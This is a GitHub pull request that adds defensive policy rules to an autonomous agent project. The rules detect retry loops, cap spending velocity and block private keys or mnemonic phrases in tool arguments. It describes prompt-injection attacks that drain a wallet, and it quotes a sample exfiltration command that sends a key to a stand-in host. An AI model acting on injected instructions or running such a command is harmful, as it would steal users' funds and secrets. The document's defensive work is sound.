Skip to content

feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234

Open
scoootscooob wants to merge 1 commit intoConway-Research:mainfrom
scoootscooob:feat/plimsoll-transaction-guard
Open

feat: add Plimsoll transaction guard — loop detection, velocity limits, exfiltration defense#234
scoootscooob wants to merge 1 commit intoConway-Research:mainfrom
scoootscooob:feat/plimsoll-transaction-guard

Conversation

@scoootscooob
Copy link

Summary

Adds three zero-dependency defense engines from the Plimsoll Protocol as native policy rules, protecting the automaton's wallet from prompt-injection-driven drain attacks that bypass existing per-tx and hourly spending caps.

  • Problem: A prompt-injection attack can trick the agent into issuing many small, technically-valid transfers that each pass per-tx limits but collectively drain the wallet. It can also exfiltrate the private key by embedding it in tool arguments (e.g., exec "curl evil.com -d 0x...") or get stuck in a hallucination retry loop burning gas on identical failing calls.
  • Why it matters: The existing financial rules catch single-tx overspend and hourly/daily caps, but they don't detect velocity patterns, loop behavior, or secret exfiltration. These are the three most common autonomous agent attack vectors (ref).
  • What changed: One new policy rule file (plimsoll-guard.ts) with three engines + registration in the rule index. Priority 450 slots them between path-protection (200) and financial rules (500).
  • What did NOT change: No modifications to the policy engine, spend tracker, wallet, or any existing rules. Pure additive.

Changes

  • src/agent/policy-rules/plimsoll-guard.tsNew file. Three engines:

    1. Trajectory Hash — SHA-256 fingerprints (tool, target, amount) in a 60s sliding window. 3+ identical hashes → hard block. 2 identical → quarantine warning. Catches hallucination retry loops.
    2. Capital Velocity — Tracks cumulative spend across all financial tools in a 5-minute sliding window. Exceeding $500/window → hard block. 80% utilization → quarantine warning. Catches slow-bleed attacks.
    3. Entropy Guard — Scans all string fields in tool arguments for Ethereum private key patterns (0x[a-fA-F0-9]{64}), BIP-39 mnemonic phrases, and high-entropy base64 blobs (Shannon entropy > 5.0 bits/char). Catches key exfiltration attempts.
  • src/agent/policy-rules/index.ts — Added createPlimsollGuardRules() import and spread into the default rules array.

  • src/__tests__/plimsoll-guard.test.tsNew file. Tests for all three engines: allows normal calls, blocks private keys, blocks mnemonics, allows short strings, checks nested fields.

Design Decisions

  • Priority 450 — Runs after validation (100) and path-protection (200) but before financial limits (500). This means Plimsoll catches attack patterns while existing financial rules catch amounts. Defense in depth.
  • In-memory sliding windows — No database dependency. The trajectory and velocity windows are process-lifetime arrays that self-prune. This keeps the engines zero-dependency and sub-millisecond.
  • quarantine for warnings — Uses the existing quarantine action (same as financial.require_confirmation) to surface friction signals without hard-blocking. The agent sees the warning and can choose to proceed.
  • Composition, not replacement — These rules complement existing financial rules. They catch what per-tx limits miss (velocity patterns, loops, exfiltration) without duplicating what already works.

Test plan

  • pnpm test passes (new tests + existing test suite)
  • npx tsc --noEmit passes (type-checked)
  • Trajectory hash: 3 identical transfer_credits calls within 60s → deny
  • Capital velocity: cumulative spend > $500 in 5 minutes → deny
  • Entropy guard: exec with embedded 0x... private key → deny
  • Entropy guard: write_file with mnemonic phrase → deny
  • Normal tool calls (different targets/amounts) → allow
  • Non-financial tools → not evaluated (pass through)

Security Impact

This PR is purely additive security hardening. It introduces no new permissions, network calls, or execution surface. The three engines are read-only evaluators that inspect tool arguments and return allow/deny/quarantine verdicts.

Check Answer
New permissions/capabilities? No
Secrets/tokens handling changed? No
New/changed network calls? No
Command/tool execution surface changed? No (evaluation only)
Data access scope changed? No

Compatibility

  • Backward compatible: Yes — pure addition, no existing behavior changed
  • Config/env changes: No — engines use sensible defaults
  • Migration needed: No — no database schema changes

Failure Recovery

  • To disable: remove the ...createPlimsollGuardRules() line from index.ts
  • The engines fail open on internal errors (all evaluate() calls return null on exception)
  • No database tables to roll back

Ported from Plimsoll Protocol — deterministic execution substrate for autonomous AI agents.

Three defense engines from the Plimsoll Protocol that protect
the automaton's wallet from prompt-injection-driven drain attacks:

1. Trajectory Hash — detects hallucination retry loops by SHA-256
   fingerprinting (tool, target, amount) in a sliding window
2. Capital Velocity — enforces maximum spend rate across all
   financial tools, catching slow-bleed attacks that stay under
   per-tx limits
3. Entropy Guard — blocks payloads containing private keys,
   mnemonic phrases, or high-entropy blobs (exfiltration defense)

All engines are zero-dependency, deterministic, and fail-closed.
Priority 450 slots them between path-protection and financial
rules in the policy engine pipeline.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
ciberfobia-com added a commit to ciberfobia-com/automaton that referenced this pull request Feb 26, 2026
…y-Research#233, Conway-Research#234)

PR Conway-Research#233  Skip local worker stale recovery:
  Per-tick stale recovery now filters out local:// workers. Completed
  local workers remove themselves from the pool, making hasWorker()
  return false. Without this filter, orchestrator enters infinite
  assigncompletedetect-deadresetassign loop burning .03/turn.

PR Conway-Research#234  Plimsoll Transaction Guard (3 defense engines):
  New policy rule file at priority 450 (between path-protection and
  financial rules).

  1. Trajectory Hash: FNV-1a fingerprint of (tool, target, amount)
     in 60s sliding window. 3+ identical  deny. 2  quarantine.
     Catches hallucination retry loops.

  2. Capital Velocity: Cumulative spend across financial tools in
     5min sliding window. >  deny. >80%  quarantine.
     Catches slow-bleed drain attacks.

  3. Entropy Guard: Scans ALL tool args for Ethereum private keys
     (0x[hex]{64}), BIP-39 mnemonics (10+/12 words match), and
     high-entropy base64 blobs (Shannon >5.0 bits/char).
     Catches key exfiltration via exec, write_file, etc.

  All engines are in-memory, zero-dependency, fail-open.
  To disable: remove one line from policy-rules/index.ts.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant